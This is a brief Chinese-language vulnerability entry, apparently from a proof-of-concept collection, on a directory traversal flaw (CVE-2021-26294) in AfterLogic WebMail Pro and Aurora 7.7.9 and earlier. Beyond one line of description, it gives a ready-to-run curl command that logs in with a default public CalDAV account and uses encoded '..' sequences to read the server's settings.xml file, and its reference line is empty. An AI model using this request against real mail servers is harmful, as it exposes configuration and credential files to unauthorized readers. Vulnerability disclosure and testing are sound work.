WebMail Pro 7.7.9 目录遍历 (CVE-2021-26294)¶
7.7.9及所有更低版本的AfterLogic Aurora和WebMail Pro产品受影响,允许未经授权的攻击者读取文件,比如数据库/用户配置文件等。
PoC:
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
ref: